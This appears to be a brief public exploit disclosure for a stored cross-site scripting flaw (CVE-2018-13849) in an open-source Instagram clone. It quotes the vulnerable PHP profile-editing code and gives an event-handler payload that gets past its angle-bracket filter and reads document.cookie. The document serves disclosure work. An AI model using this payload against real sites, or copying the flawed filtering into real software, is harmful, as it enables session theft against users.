# Exploit Title: Instagram-clone Script 2.0 - Cross-Site Scripting # Date: 2018-07-10 # Exploit Author: L0RD # Vendor Homepage: https://github.com/yTakkar/Instagram-clone # Version: 2.0 # CVE: CVE-2018-13849 # Tested on: Kali linux # POC : Persistent Cross site scripting : # vulnerable file : edit_requests.php # vulnerable code : if (isset($_POST['username'])) { $username = preg_replace("#[<> ]#i", "", $_POST['username']); $firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']); $surname = preg_replace("#[<> ]#i", "", $_POST['surname']); $bio = preg_replace("#[<>]#i", "", $_POST['bio']); $instagram = preg_replace("#[<>]#i", "", $_POST['instagram']); $youtube = preg_replace("#[<>]#i", "", $_POST['youtube']); $facebook = preg_replace("#[<>]#i", "", $_POST['facebook']); $twitter = preg_replace("#[<>]#i", "", $_POST['twitter']); $website = preg_replace("#[<>]#i", "", $_POST['website']); $mobile = preg_replace("#[^0-9]#i", "", $_POST['mobile']); $tags = preg_replace("#[\s]#", "-", $_POST['tags']); $session = $_SESSION['id']; $m=$edit->saveProfileEditing($username, $firstname, $surname, $bio, $instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags); $array = array("mssg" => $m); echo json_encode($array); } # We use this payload to bypass filter : # Payload : "onmouseover=" alert(document.cookie)